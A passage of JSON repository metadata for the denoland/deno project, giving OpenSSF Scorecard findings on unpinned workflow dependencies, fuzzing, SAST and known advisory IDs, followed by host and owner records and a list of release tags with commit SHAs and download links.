https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4